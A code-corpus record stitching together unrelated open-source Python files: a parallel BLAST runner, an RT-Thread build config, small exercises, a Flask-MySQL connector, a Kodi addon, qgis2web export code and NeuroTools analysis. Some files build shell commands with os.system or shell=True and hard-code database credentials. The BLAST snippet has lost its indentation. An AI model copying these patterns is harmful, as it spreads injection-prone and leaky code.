tmpDir=tempfile.mkdtemp(prefix="parablast",dir= wDir)
nbSeqsbyfile=nbSeqs/nbPart
modulo=nbSeqs%nbPart
iteSeqs=0
for i in range(0,nbPart-1):
tmpFasta=tempfile.mkstemp(dir=tmpDir,suffix="."+str(i)+".fasta")
SeqIO.write(seqs[iteSeqs:iteSeqs+nbSeqsbyfile], tmpFasta[1], "fasta")
iteSeqs+=nbSeqsbyfile
tmpFasta=tempfile.mkstemp(dir=tmpDir,suffix="."+str(nbPart)+".fasta")
SeqIO.write(seqs[iteSeqs:nbSeqs], tmpFasta[1], "fasta")
#### runs the blast
my_blast_files = os.listdir(tmpDir)
myProcesses=[]
for blast_file in my_blast_files:
cmd= "blastall -m 8"+" "+ " "+\
"-p"+" "+ my_blast_prog + " "+\
"-i"+" "+ tmpDir+"/"+blast_file + " "+\
"-d"+" "+ bank + " "+\
"-o"+" "+ tmpDir+"/"+blast_file.replace("fasta","blast") + " "+\
blastOpt
myProcesses.append(subprocess.Popen(cmd,shell=True))
#### waits for the end of all processes
for i in myProcesses:
i.wait()
#### concatenates the blast files results
#### and removes the temp files used
os.system("cat " + tmpDir+"/"+"*.blast > "+ wDir + '/' + str.split(fastafile,'/')[-1]+".vs."+str.split(bank,'/')[-1]+".blast")
os.system("rm -rf "+ tmpDir)
| alunem/bioman | blast/bmn-paraBlastKepler.py | Python | gpl-2.0 | 2,591 |
import os
# toolchains options
# Target architecture / core for this RT-Thread BSP (Cortex-M4)
ARCH='arm'
CPU='cortex-m4'
CROSS_TOOL='keil'
# The RTT_CC environment variable overrides the default toolchain choice.
if os.getenv('RTT_CC'):
    CROSS_TOOL = os.getenv('RTT_CC')
# cross_tool provides the cross compiler
# EXEC_PATH is the compiler execute path, for example, CodeSourcery, Keil MDK, IAR
if CROSS_TOOL == 'gcc':
    PLATFORM = 'gcc'
    EXEC_PATH = 'D:/SourceryGCC/bin'
elif CROSS_TOOL == 'keil':
    PLATFORM = 'armcc'
    EXEC_PATH = 'C:/Keil_v5'
elif CROSS_TOOL == 'iar':
    # IAR is not wired up for this BSP: bail out early.
    print('================ERROR============================')
    print('Not support iar yet!')
    print('=================================================')
    exit(0)
# RTT_EXEC_PATH overrides the compiler location regardless of toolchain.
if os.getenv('RTT_EXEC_PATH'):
    EXEC_PATH = os.getenv('RTT_EXEC_PATH')
BUILD = 'debug'
if PLATFORM == 'gcc':
    # toolchains (GNU ARM Embedded / Sourcery)
    PREFIX = 'arm-none-eabi-'
    CC = PREFIX + 'gcc'
    AS = PREFIX + 'gcc'
    AR = PREFIX + 'ar'
    LINK = PREFIX + 'gcc'
    TARGET_EXT = 'elf'
    SIZE = PREFIX + 'size'
    OBJDUMP = PREFIX + 'objdump'
    OBJCPY = PREFIX + 'objcopy'
    DEVICE = ' -mcpu=cortex-m4 -mthumb -ffunction-sections -fdata-sections'
    CFLAGS = DEVICE
    AFLAGS = ' -c' + DEVICE + ' -x assembler-with-cpp'
    LFLAGS = DEVICE + ' -Wl,--gc-sections,-Map=rtthread.map,-cref,-u,Reset_Handler -T board/linker_scripts/link.lds'
    CPATH = ''
    LPATH = ''
    if BUILD == 'debug':
        CFLAGS += ' -O0 -gdwarf-2'
        AFLAGS += ' -gdwarf-2'
    else:
        CFLAGS += ' -O2'
    # After linking: produce rtthread.bin and print the section sizes.
    POST_ACTION = OBJCPY + ' -O binary $TARGET rtthread.bin\n' + SIZE + ' $TARGET \n'
elif PLATFORM == 'armcc':
    # toolchains (Keil MDK / armcc)
    CC = 'armcc'
    AS = 'armasm'
    AR = 'armar'
    LINK = 'armlink'
    TARGET_EXT = 'axf'
    DEVICE = ' --device DARMSTM'
    CFLAGS = DEVICE + ' --apcs=interwork'
    AFLAGS = DEVICE
    LFLAGS = DEVICE + ' --info sizes --info totals --info unused --info veneers --list rtthread.map --scatter "board\linker_scripts\link.sct"'
    CFLAGS += ' --c99'
    CFLAGS += ' -I' + EXEC_PATH + '/ARM/RV31/INC'
    LFLAGS += ' --libpath ' + EXEC_PATH + '/ARM/RV31/LIB'
    EXEC_PATH += '/arm/bin40/'
    if BUILD == 'debug':
        CFLAGS += ' -g -O0'
        AFLAGS += ' -g'
    else:
        CFLAGS += ' -O2'
    # After linking: convert the axf to a raw binary and disassemble it.
    POST_ACTION = 'fromelf --bin $TARGET --output rtthread.bin \nfromelf -z $TARGET'
| blueskycoco/rt-thread | bsp/nrf5x/nrf52840/rtconfig.py | Python | gpl-2.0 | 2,265 |
class int(int):
    """Integer subclass adding a primality test.

    NOTE(review): shadowing the builtin ``int`` is kept only because
    callers rely on this name; consider renaming the class.
    """

    def isPrime(self):
        """Return 1 if this number is prime, 0 otherwise.

        Fixes the original trial-division loop, whose upper bound
        ``range(2, int(self**(1/2)))`` excluded the square root itself
        (so composites such as 4, 9 or 25 were reported prime) and,
        under Python 2 integer division, collapsed to an empty range.
        Numbers below 2 are not prime by definition.
        """
        if self < 2:
            return 0
        q = 2
        # Trial division up to and including floor(sqrt(self)).
        while q * q <= self:
            if self % q == 0:
                return 0
            q += 1
        return 1
| cabanm/project-euler | primes.py | Python | gpl-2.0 | 212 |
#!/usr/bin/env python
#Name: Ian Wong
#Date: 1/3/16
#Assignment: Counting Vowels
# Ask for a line of text, fold it to lower case, and report how many
# times each vowel occurs.
text = input("What is your string?").lower()

for vowel in "aeiou":
    print("There are %i %s in the text." % (text.count(vowel), vowel))
# coding:utf-8
'''
Created on 19/1/2015
@author: PC30
'''
from flaskext.mysql import MySQL#importar mysql
from flask import Flask#importar flask
class DBcon():
    '''
    Helper that wires the Flask-MySQL extension to the ``sisventas``
    database and hands back the configured MySQL object.
    '''
    pass
    def __init__(self):
        '''
        Constructor (no state to initialise).
        '''
        pass
    def conexion(self):
        '''
        Build a Flask app configured for the MySQL connection.

        :return: the initialised ``flaskext.mysql.MySQL`` instance
        '''
        mysql = MySQL()  # instantiate the Flask-MySQL extension
        app = Flask(__name__)  # Flask app used here only to carry the config
        # NOTE(review): credentials are hard-coded in source; consider moving
        # them to configuration or environment variables.
        app.config['MYSQL_DATABASE_USER'] = 'python'  # database user name
        app.config['MYSQL_DATABASE_PASSWORD'] = '123456'  # database password
        app.config['MYSQL_DATABASE_DB'] = 'sisventas'  # database (schema) name
        app.config['MYSQL_DATABASE_HOST'] = 'localhost'  # database server host
        mysql.init_app(app)
        return mysql
| git-pedro-77/proyecto_final_p_f | proyectoITSAE/ec/edu/itsae/conn/DBcon.py | Python | gpl-2.0 | 772 |
import xbmcaddon
import xbmcgui
import subprocess,os
def EstoEsUnaFun( str ):
    # Show a simple three-line "OK" dialog; ``str`` is the third line.
    # NOTE(review): the parameter shadows the builtin ``str``.
    xbmcgui.Dialog().ok("ESO ES","AHHHH",str)
    return
addon = xbmcaddon.Addon()
addonname = addon.getAddonInfo('name')
line1 = "Hello World!"
line2 = "We can write anything we want here"
line3 = "Using Python"
my_setting = addon.getSetting('my_setting') # returns the string 'true' or 'false'
addon.setSetting('my_setting', 'false')
# NOTE(review): writes a marker file via the shell on every run -- looks like
# debugging leftover; confirm before shipping.
os.system("echo caca>>/home/rafa400/caca.txt")
dia=xbmcgui.Dialog();
# NOTE(review): addControl() belongs to xbmcgui.Window, not Dialog -- this
# call looks like it would raise at runtime; verify against the Kodi API.
dia.addControl(xbmcgui.ControlLabel(x=190, y=25, width=500, height=25, label="Hoooolaa"))
dia.ok(addonname, line1, line2, line3 + my_setting)
#xbmcgui.Window().show()
| rafa400/telepi | script.telepi-master/addon.py | Python | gpl-2.0 | 669 |
import re
import traceback
import os
import codecs
from urlparse import parse_qs
from PyQt4.QtCore import QCoreApplication
from qgis.core import (QgsRenderContext,
QgsSingleSymbolRendererV2,
QgsCategorizedSymbolRendererV2,
QgsGraduatedSymbolRendererV2,
QgsHeatmapRenderer,
QgsCoordinateReferenceSystem,
QgsCoordinateTransform,
QgsMessageLog)
from utils import safeName, is25d, BLEND_MODES
from basemaps import basemapOL
def writeLayersAndGroups(layers, groups, visible, folder, popup,
                         settings, json, matchCRS, clustered, iface,
                         restrictToExtent, extent):
    """Generate <folder>/layers/layers.js for the exported OpenLayers map.

    Emits JS definitions for the base-map group, one variable per QGIS
    layer (via layerToJavascript), layer groups, initial visibility,
    the layersList array, popup field aliases/images/labels and blend
    modes, then writes everything to layers/layers.js.

    Returns the OSMBuildings bootstrap snippet for 2.5D layers (empty
    string when no 2.5D layer is present).
    """
    canvas = iface.mapCanvas()
    basemapList = settings["Appearance"]["Base layer"]
    basemaps = [basemapOL()[item] for _, item in enumerate(basemapList)]
    # The group gets a visible title only when there is a real choice.
    if len(basemapList) > 1:
        baseGroup = "Base maps"
    else:
        baseGroup = ""
    baseLayer = """var baseLayer = new ol.layer.Group({
    'title': '%s',
    layers: [%s\n]
});""" % (baseGroup, ','.join(basemaps))
    # Build one JS variable per non-2.5D layer; 2.5D layers are handled
    # by OSMBuildings below.  is25d() may raise for some layer types,
    # hence the broad except that still emits the layer.
    layerVars = ""
    layer_names_id = {}
    for count, (layer, encode2json, cluster) in enumerate(zip(layers, json,
                                                              clustered)):
        layer_names_id[layer.id()] = str(count)
        try:
            if is25d(layer, canvas, restrictToExtent, extent):
                pass
            else:
                layerVars += "\n".join([layerToJavascript(iface, layer,
                                                          encode2json,
                                                          matchCRS, cluster,
                                                          restrictToExtent,
                                                          extent, count)])
        except:
            layerVars += "\n".join([layerToJavascript(iface, layer,
                                                      encode2json, matchCRS,
                                                      cluster,
                                                      restrictToExtent,
                                                      extent, count)])
    # One ol.layer.Group per QGIS layer group; remember which group each
    # layer belongs to for the ordering pass below.
    groupVars = ""
    groupedLayers = {}
    for group, groupLayers in groups.iteritems():
        groupVars += ('''var %s = new ol.layer.Group({
                                layers: [%s],
                                title: "%s"});\n''' %
                      ("group_" + safeName(group),
                       ",".join(["lyr_" + safeName(layer.name())
                                 + layer_names_id[layer.id()]
                                 for layer in groupLayers]),
                       group))
        for layer in groupLayers:
            groupedLayers[layer.id()] = safeName(group)
    # Collect the map's layer variables; 2.5D layers instead produce the
    # OSMBuildings snippet (shadows enabled unless the paint effect is off).
    mapLayers = ["baseLayer"]
    usedGroups = []
    osmb = ""
    for count, layer in enumerate(layers):
        try:
            renderer = layer.rendererV2()
            if is25d(layer, canvas, restrictToExtent, extent):
                shadows = ""
                renderer = layer.rendererV2()
                renderContext = QgsRenderContext.fromMapSettings(
                    canvas.mapSettings())
                fields = layer.pendingFields()
                renderer.startRender(renderContext, fields)
                for feat in layer.getFeatures():
                    if isinstance(renderer, QgsCategorizedSymbolRendererV2):
                        classAttribute = renderer.classAttribute()
                        attrValue = feat.attribute(classAttribute)
                        catIndex = renderer.categoryIndexForValue(attrValue)
                        categories = renderer.categories()
                        symbol = categories[catIndex].symbol()
                    elif isinstance(renderer, QgsGraduatedSymbolRendererV2):
                        classAttribute = renderer.classAttribute()
                        attrValue = feat.attribute(classAttribute)
                        ranges = renderer.ranges()
                        for range in ranges:
                            if (attrValue >= range.lowerValue() and
                                    attrValue <= range.upperValue()):
                                symbol = range.symbol().clone()
                    else:
                        symbol = renderer.symbolForFeature2(feat,
                                                            renderContext)
                    symbolLayer = symbol.symbolLayer(0)
                    if not symbolLayer.paintEffect().effectList()[0].enabled():
                        shadows = "'2015-07-15 10:00:00'"
                renderer.stopRender(renderContext)
                osmb = """
var osmb = new OSMBuildings(map).date(new Date({shadows}));
osmb.set(geojson_{sln}{count});""".format(shadows=shadows,
                                          sln=safeName(layer.name()),
                                          count=unicode(count))
            else:
                mapLayers.append("lyr_" + safeName(layer.name()) +
                                 unicode(count))
        except:
            QgsMessageLog.logMessage(traceback.format_exc(), "qgis2web",
                                     level=QgsMessageLog.CRITICAL)
            mapLayers.append("lyr_" + safeName(layer.name()) + unicode(count))
    # Initial visibility statements (the base layer is always visible).
    visibility = ""
    for layer, v in zip(mapLayers[1:], visible):
        visibility += "\n".join(["%s.setVisible(%s);" % (layer,
                                                         unicode(v).lower())])
    # Assemble layersList: base layer, then groups (once each), then
    # ungrouped layers, preserving project order.
    group_list = ["baseLayer"] if len(basemapList) else []
    no_group_list = []
    for count, layer in enumerate(layers):
        try:
            if is25d(layer, canvas, restrictToExtent, extent):
                pass
            else:
                if layer.id() in groupedLayers:
                    groupName = groupedLayers[layer.id()]
                    if groupName not in usedGroups:
                        group_list.append("group_" + safeName(groupName))
                        usedGroups.append(groupName)
                else:
                    no_group_list.append("lyr_" + safeName(layer.name()) +
                                         unicode(count))
        except:
            if layer.id() in groupedLayers:
                groupName = groupedLayers[layer.id()]
                if groupName not in usedGroups:
                    group_list.append("group_" + safeName(groupName))
                    usedGroups.append(groupName)
            else:
                no_group_list.append("lyr_" + safeName(layer.name()) +
                                     unicode(count))
    layersList = []
    for layer in (group_list + no_group_list):
        layersList.append(layer)
    layersListString = "var layersList = [" + ",".join(layersList) + "];"
    # Per-vector-layer popup metadata: field aliases, edit-widget types
    # (used to render images/links) and user-chosen popup labels.
    fieldAliases = ""
    fieldImages = ""
    fieldLabels = ""
    blend_mode = ""
    for count, (layer, labels) in enumerate(zip(layers, popup)):
        sln = safeName(layer.name()) + unicode(count)
        if layer.type() == layer.VectorLayer and not is25d(layer, canvas,
                                                           restrictToExtent,
                                                           extent):
            fieldList = layer.pendingFields()
            aliasFields = ""
            imageFields = ""
            labelFields = ""
            for field, label in zip(labels.keys(), labels.values()):
                labelFields += "'%(field)s': '%(label)s', " % (
                    {"field": field, "label": label})
            labelFields = "{%(labelFields)s});\n" % (
                {"labelFields": labelFields})
            labelFields = "lyr_%(name)s.set('fieldLabels', " % (
                {"name": sln}) + labelFields
            fieldLabels += labelFields
            for f in fieldList:
                fieldIndex = fieldList.indexFromName(unicode(f.name()))
                aliasFields += "'%(field)s': '%(alias)s', " % (
                    {"field": f.name(),
                     "alias": layer.attributeDisplayName(fieldIndex)})
                widget = layer.editFormConfig().widgetType(fieldIndex)
                imageFields += "'%(field)s': '%(image)s', " % (
                    {"field": f.name(),
                     "image": widget})
            aliasFields = "{%(aliasFields)s});\n" % (
                {"aliasFields": aliasFields})
            aliasFields = "lyr_%(name)s.set('fieldAliases', " % (
                {"name": sln}) + aliasFields
            fieldAliases += aliasFields
            imageFields = "{%(imageFields)s});\n" % (
                {"imageFields": imageFields})
            imageFields = "lyr_%(name)s.set('fieldImages', " % (
                {"name": sln}) + imageFields
            fieldImages += imageFields
            # NOTE(review): blend_mode is overwritten each iteration, so only
            # the last vector layer's blend mode is written -- confirm intent.
            blend_mode = """lyr_%(name)s.on('precompose', function(evt) {
    evt.context.globalCompositeOperation = '%(blend)s';
});""" % (
                {"name": sln,
                 "blend": BLEND_MODES[layer.blendMode()]})
    path = os.path.join(folder, "layers", "layers.js")
    with codecs.open(path, "w", "utf-8") as f:
        if basemapList:
            f.write(baseLayer + "\n")
        f.write(layerVars + "\n")
        f.write(groupVars + "\n")
        f.write(visibility + "\n")
        f.write(layersListString + "\n")
        f.write(fieldAliases)
        f.write(fieldImages)
        f.write(fieldLabels)
        f.write(blend_mode)
    return osmb
def layerToJavascript(iface, layer, encode2json, matchCRS, cluster,
                      restrictToExtent, extent, count):
    """Return the JavaScript snippet defining one OpenLayers layer.

    Vector layers become ol.layer.Vector (optionally clustered) or
    Heatmap layers; WMS rasters become XYZ/WMTS/TileWMS tile layers;
    GDAL rasters become a static image referencing an exported PNG.
    Falls through (returns None) for layer types not handled here.
    """
    # Convert the QGIS scale-based visibility range into OL resolutions.
    # 39.37 * 90.7 presumably converts scale denominator via inches/metre
    # and screen DPI -- TODO confirm against qgis2web conventions.
    if layer.hasScaleBasedVisibility():
        if layer.minimumScale() != 0:
            minRes = 1 / ((1 / layer.minimumScale()) * 39.37 * 90.7)
            minResolution = "\nminResolution:%s,\n" % unicode(minRes)
        else:
            minResolution = ""
        if layer.maximumScale() != 0:
            maxRes = 1 / ((1 / layer.maximumScale()) * 39.37 * 90.7)
            maxResolution = "maxResolution:%s,\n" % unicode(maxRes)
        else:
            maxResolution = ""
    else:
        minResolution = ""
        maxResolution = ""
    layerName = safeName(layer.name()) + unicode(count)
    attrText = layer.attribution()
    attrUrl = layer.attributionUrl()
    layerAttr = '<a href="%s">%s</a>' % (attrUrl, attrText)
    if layer.type() == layer.VectorLayer and not is25d(layer,
                                                       iface.mapCanvas(),
                                                       restrictToExtent,
                                                       extent):
        renderer = layer.rendererV2()
        # Clustering is only supported for single-symbol renderers.
        if (cluster and isinstance(renderer, QgsSingleSymbolRendererV2)):
            cluster = True
        else:
            cluster = False
        if isinstance(renderer, QgsHeatmapRenderer):
            # Translate the QGIS heatmap settings (radius, colour ramp,
            # optional weight expression) into ol.layer.Heatmap options.
            pointLayerType = "Heatmap"
            hmRadius = renderer.radius()
            colorRamp = renderer.colorRamp()
            hmStart = colorRamp.color1().name()
            hmEnd = colorRamp.color2().name()
            hmRamp = "['" + hmStart + "', "
            hmStops = colorRamp.stops()
            for stop in hmStops:
                hmRamp += "'" + stop.color.name() + "', "
            hmRamp += "'" + hmEnd + "']"
            hmWeight = renderer.weightExpression()
            hmWeightId = layer.fieldNameIndex(hmWeight)
            hmWeightMax = layer.maximumValue(hmWeightId)
        else:
            pointLayerType = "Vector"
        # GeoJSON data is stored in EPSG:4326; reproject to the map CRS
        # (or the default web-mercator view) on read.
        if matchCRS:
            mapCRS = iface.mapCanvas().mapSettings().destinationCrs().authid()
            crsConvert = """
            {dataProjection: 'EPSG:4326', featureProjection: '%(d)s'}""" % {
                "d": mapCRS}
        else:
            crsConvert = """
            {dataProjection: 'EPSG:4326', featureProjection: 'EPSG:3857'}"""
        if layer.providerType() == "WFS" and not encode2json:
            # Remote WFS layer: features arrive later via a JSONP-style
            # callback (get<name>Json) instead of an embedded geojson var.
            layerCode = '''var format_%(n)s = new ol.format.GeoJSON();
var jsonSource_%(n)s = new ol.source.Vector({
    attributions: [new ol.Attribution({html: '%(layerAttr)s'})],
    format: format_%(n)s
});''' % {"n": layerName, "layerAttr": layerAttr}
            if cluster:
                layerCode += '''cluster_%(n)s = new ol.source.Cluster({
  distance: 10,
  source: jsonSource_%(n)s
});''' % {"n": layerName}
            layerCode += '''var lyr_%(n)s = new ol.layer.Vector({
                source: ''' % {"n": layerName}
            if cluster:
                layerCode += 'cluster_%(n)s,' % {"n": layerName}
            else:
                layerCode += 'jsonSource_%(n)s,' % {"n": layerName}
            layerCode += '''%(min)s %(max)s
                style: style_%(n)s,
                title: "%(name)s"
            });
            function get%(n)sJson(geojson) {
                var features_%(n)s = format_%(n)s.readFeatures(geojson);
                jsonSource_%(n)s.addFeatures(features_%(n)s);
            }''' % {
                "name": layer.name(), "n": layerName,
                "min": minResolution, "max": maxResolution}
            return layerCode
        else:
            # Local layer: features are read from an embedded geojson_<n>
            # variable generated elsewhere in the export.
            layerCode = '''var format_%(n)s = new ol.format.GeoJSON();
var features_%(n)s = format_%(n)s.readFeatures(geojson_%(n)s, %(crs)s);
var jsonSource_%(n)s = new ol.source.Vector({
    attributions: [new ol.Attribution({html: '%(layerAttr)s'})],
});
jsonSource_%(n)s.addFeatures(features_%(n)s);''' % {"n": layerName,
                                                    "crs": crsConvert,
                                                    "layerAttr": layerAttr}
            if cluster:
                layerCode += '''cluster_%(n)s = new ol.source.Cluster({
  distance: 10,
  source: jsonSource_%(n)s
});''' % {"n": layerName}
            layerCode += '''var lyr_%(n)s = new ol.layer.%(t)s({
                source:''' % {"n": layerName, "t": pointLayerType}
            if cluster:
                layerCode += 'cluster_%(n)s,' % {"n": layerName}
            else:
                layerCode += 'jsonSource_%(n)s,' % {"n": layerName}
            layerCode += '''%(min)s %(max)s''' % {"min": minResolution,
                                                  "max": maxResolution}
            if pointLayerType == "Vector":
                layerCode += '''
                style: style_%(n)s,''' % {"n": layerName}
            else:
                layerCode += '''
                radius: %(hmRadius)d * 2,
                gradient: %(hmRamp)s,
                blur: 15,
                shadow: 250,''' % {"hmRadius": hmRadius, "hmRamp": hmRamp}
                if hmWeight != "":
                    layerCode += '''
                weight: function(feature){
                    var weightField = '%(hmWeight)s';
                    var featureWeight = feature.get(weightField);
                    var maxWeight = %(hmWeightMax)d;
                    var calibratedWeight = featureWeight/maxWeight;
                    return calibratedWeight;
                },''' % {"hmWeight": hmWeight, "hmWeightMax": hmWeightMax}
            layerCode += '''
                title: "%(name)s"
            });''' % {"name": layer.name()}
            return layerCode
    elif layer.type() == layer.RasterLayer:
        if layer.providerType().lower() == "wms":
            source = layer.source()
            opacity = layer.renderer().opacity()
            # The QGIS WMS source string is URL-query encoded; pick it apart.
            d = parse_qs(source)
            if "type" in d and d["type"][0] == "xyz":
                return """
        var lyr_%s = new ol.layer.Tile({
            'title': '%s',
            'type': 'base',
            'opacity': %f,
            %s
            %s
            source: new ol.source.XYZ({
    attributions: [new ol.Attribution({html: '%s'})],
                url: '%s'
            })
        });""" % (layerName, layerName, opacity, minResolution, maxResolution,
                  layerAttr, d["url"][0])
            elif "tileMatrixSet" in d:
                layerId = d["layers"][0]
                url = d["url"][0]
                format = d["format"][0]
                style = d["styles"][0]
                return '''
    var projection_%(n)s = ol.proj.get('EPSG:3857');
    var projectionExtent_%(n)s = projection_%(n)s.getExtent();
    var size_%(n)s = ol.extent.getWidth(projectionExtent_%(n)s) / 256;
    var resolutions_%(n)s = new Array(14);
    var matrixIds_%(n)s = new Array(14);
    for (var z = 0; z < 14; ++z) {
        // generate resolutions and matrixIds arrays for this WMTS
        resolutions_%(n)s[z] = size_%(n)s / Math.pow(2, z);
        matrixIds_%(n)s[z] = z;
    }
    var lyr_%(n)s = new ol.layer.Tile({
                            source: new ol.source.WMTS(({
                              url: "%(url)s",
    attributions: [new ol.Attribution({html: '%(layerAttr)s'})],
                              "layer": "%(layerId)s",
                              "TILED": "true",
                              matrixSet: 'EPSG:3857',
                              format: '%(format)s',
                              projection: projection_%(n)s,
                              tileGrid: new ol.tilegrid.WMTS({
                                origin: ol.extent.getTopLeft(projectionExtent_%(n)s),
                                resolutions: resolutions_%(n)s,
                                matrixIds: matrixIds_%(n)s
                              }),
                              style: '%(style)s',
                              wrapX: true,
                              "VERSION": "1.0.0",
                            })),
                            title: "%(name)s",
                            opacity: %(opacity)s,
                            %(minRes)s
                            %(maxRes)s
                          });''' % {"layerId": layerId, "url": url,
                                    "layerAttr": layerAttr, "format": format,
                                    "n": layerName, "name": layer.name(),
                                    "opacity": opacity, "style": style,
                                    "minRes": minResolution,
                                    "maxRes": maxResolution}
            else:
                # Plain WMS: recover layer list, URL and protocol version
                # (the version is scraped from the provider metadata HTML).
                layers = re.search(r"layers=(.*?)(?:&|$)", source).groups(0)[0]
                url = re.search(r"url=(.*?)(?:&|$)", source).groups(0)[0]
                metadata = layer.metadata()
                needle = "<tr><td>%s</td><td>(.+?)</td>" % (
                    QCoreApplication.translate("QgsWmsProvider",
                                               "WMS Version"))
                result = re.search(needle, metadata)
                if result:
                    version = result.group(1)
                else:
                    version = ""
                return '''var lyr_%(n)s = new ol.layer.Tile({
                            source: new ol.source.TileWMS(({
                              url: "%(url)s",
    attributions: [new ol.Attribution({html: '%(layerAttr)s'})],
                              params: {
                                "LAYERS": "%(layers)s",
                                "TILED": "true",
                                "VERSION": "%(version)s"},
                            })),
                            title: "%(name)s",
                            opacity: %(opacity)f,
                            %(minRes)s
                            %(maxRes)s
                          });''' % {"layers": layers, "url": url,
                                    "layerAttr": layerAttr,
                                    "n": layerName, "name": layer.name(),
                                    "version": version, "opacity": opacity,
                                    "minRes": minResolution,
                                    "maxRes": maxResolution}
        elif layer.providerType().lower() == "gdal":
            # Local raster: referenced as a pre-rendered PNG whose extent is
            # reprojected to web mercator (EPSG:3857).
            provider = layer.dataProvider()
            crsSrc = layer.crs()
            crsDest = QgsCoordinateReferenceSystem(3857)
            xform = QgsCoordinateTransform(crsSrc, crsDest)
            extentRep = xform.transform(layer.extent())
            sExtent = "[%f, %f, %f, %f]" % (extentRep.xMinimum(),
                                            extentRep.yMinimum(),
                                            extentRep.xMaximum(),
                                            extentRep.yMaximum())
            return '''var lyr_%(n)s = new ol.layer.Image({
                            opacity: 1,
                            title: "%(name)s",
                            %(minRes)s
                            %(maxRes)s
                            source: new ol.source.ImageStatic({
                               url: "./layers/%(n)s.png",
    attributions: [new ol.Attribution({html: '%(layerAttr)s'})],
                                projection: 'EPSG:3857',
                                alwaysInRange: true,
                                //imageSize: [%(col)d, %(row)d],
                                imageExtent: %(extent)s
                            })
                        });''' % {"n": layerName,
                                  "extent": sExtent,
                                  "col": provider.xSize(),
                                  "name": layer.name(),
                                  "minRes": minResolution,
                                  "maxRes": maxResolution,
                                  "layerAttr": layerAttr,
                                  "row": provider.ySize()}
| lucacasagrande/qgis2web | olLayerScripts.py | Python | gpl-2.0 | 21,275 |
"""
NeuroTools.analysis
==================
A collection of analysis functions that may be used by NeuroTools.signals or other packages.
.. currentmodule:: NeuroTools.analysis
Classes
-------
.. autosummary::
TuningCurve
Functions
---------
.. autosummary::
:nosignatures:
ccf
crosscorrelate
make_kernel
simple_frequency_spectrum
"""
import numpy as np
from NeuroTools import check_dependency
# Optional plotting dependencies: record availability flags and an error
# message for later use instead of failing at import time.
HAVE_MATPLOTLIB = check_dependency('matplotlib')
if HAVE_MATPLOTLIB:
    import matplotlib
    matplotlib.use('Agg')  # headless backend: no display required
else:
    MATPLOTLIB_ERROR = "The matplotlib package was not detected"
HAVE_PYLAB = check_dependency('pylab')
if HAVE_PYLAB:
    import pylab
else:
    PYLAB_ERROR = "The pylab package was not detected"
def ccf(x, y, axis=None):
    """Fast cross correlation function based on fft.

    Computes the cross-correlation function of two series.
    Note that the computations are performed on anomalies (deviations from
    average).

    Returns the values of the cross-correlation at different lags.

    Parameters
    ----------
    x, y : 1D MaskedArrays
        The two input arrays.
    axis : integer, optional
        Axis along which to compute (0 for rows, 1 for cols).
        If `None`, the array is flattened first.

    Examples
    --------
    >>> z = arange(5)
    >>> ccf(z,z)
    array([  3.90798505e-16,  -4.00000000e-01,  -4.00000000e-01,
            -1.00000000e-01,   4.00000000e-01,   1.00000000e+00,
             4.00000000e-01,  -1.00000000e-01,  -4.00000000e-01,
            -4.00000000e-01])
    """
    assert x.ndim == y.ndim, "Inconsistent shape !"
    if axis is None:
        if x.ndim > 1:
            x = x.ravel()
            y = y.ravel()
        # Zero-pad to the combined length so the circular FFT correlation
        # equals the linear correlation.
        npad = x.size + y.size
        xanom = (x - x.mean(axis=None))
        yanom = (y - y.mean(axis=None))
        Fx = np.fft.fft(xanom, npad)
        Fy = np.fft.fft(yanom, npad)
        iFxy = np.fft.ifft(Fx.conj() * Fy).real
        varxy = np.sqrt(np.inner(xanom, xanom) * np.inner(yanom, yanom))
    else:
        npad = x.shape[axis] + y.shape[axis]
        if axis == 1:
            if x.shape[0] != y.shape[0]:
                raise ValueError("Arrays should have the same length!")
            xanom = (x - x.mean(axis=1)[:, None])
            yanom = (y - y.mean(axis=1)[:, None])
            varxy = np.sqrt((xanom * xanom).sum(1) *
                            (yanom * yanom).sum(1))[:, None]
        else:
            if x.shape[1] != y.shape[1]:
                raise ValueError("Arrays should have the same width!")
            xanom = (x - x.mean(axis=0))
            yanom = (y - y.mean(axis=0))
            varxy = np.sqrt((xanom * xanom).sum(0) * (yanom * yanom).sum(0))
        Fx = np.fft.fft(xanom, npad, axis=axis)
        Fy = np.fft.fft(yanom, npad, axis=axis)
        iFxy = np.fft.ifft(Fx.conj() * Fy, n=npad, axis=axis).real
    # We just turn the lags into correct positions.  Floor division (//)
    # keeps this valid under Python 3, where ``len(iFxy) / 2`` is a float
    # and would raise TypeError when used as a slice index.
    half = len(iFxy) // 2
    iFxy = np.concatenate((iFxy[half:len(iFxy)], iFxy[0:half]))
    return iFxy / varxy
from NeuroTools.plotting import get_display, set_labels
HAVE_PYLAB = check_dependency('pylab')
def crosscorrelate(sua1, sua2, lag=None, n_pred=1, predictor=None,
display=False, kwargs={}):
"""Cross-correlation between two series of discrete events (e.g. spikes).
Calculates the cross-correlation between
two vectors containing event times.
    Returns ``(differences, pred, norm)``. See below for details.
Adapted from original script written by Martin P. Nawrot for the
FIND MATLAB toolbox [1]_.
Parameters
----------
sua1, sua2 : 1D row or column `ndarray` or `SpikeTrain`
Event times. If sua2 == sua1, the result is the autocorrelogram.
lag : float
Lag for which relative event timing is considered
with a max difference of +/- lag. A default lag is computed
from the inter-event interval of the longer of the two sua
arrays.
n_pred : int
Number of surrogate compilations for the predictor. This
influences the total length of the predictor output array
predictor : {None, 'shuffle'}
Determines the type of bootstrap predictor to be used.
'shuffle' shuffles interevent intervals of the longer input array
and calculates relative differences with the shorter input array.
`n_pred` determines the number of repeated shufflings, resulting
differences are pooled from all repeated shufflings.
display : boolean
If True the corresponding plots will be displayed. If False,
int, int_ and norm will be returned.
kwargs : dict
Arguments to be passed to np.histogram.
Returns
-------
differences : np array
Accumulated differences of events in `sua1` minus the events in
`sua2`. Thus positive values relate to events of `sua2` that
lead events of `sua1`. Units are the same as the input arrays.
pred : np array
Accumulated differences based on the prediction method.
The length of `pred` is ``n_pred * length(differences)``. Units are
the same as the input arrays.
norm : float
Normalization factor used to scale the bin heights in `differences` and
`pred`. ``differences/norm`` and ``pred/norm`` correspond to the linear
correlation coefficient.
Examples
--------
>> crosscorrelate(np_array1, np_array2)
>> crosscorrelate(spike_train1, spike_train2)
>> crosscorrelate(spike_train1, spike_train2, lag = 150.0)
>> crosscorrelate(spike_train1, spike_train2, display=True,
kwargs={'bins':100})
See also
--------
ccf
.. [1] Meier R, Egert U, Aertsen A, Nawrot MP, "FIND - a unified framework
for neural data analysis"; Neural Netw. 2008 Oct; 21(8):1085-93.
"""
assert predictor is 'shuffle' or predictor is None, "predictor must be \
either None or 'shuffle'. Other predictors are not yet implemented."
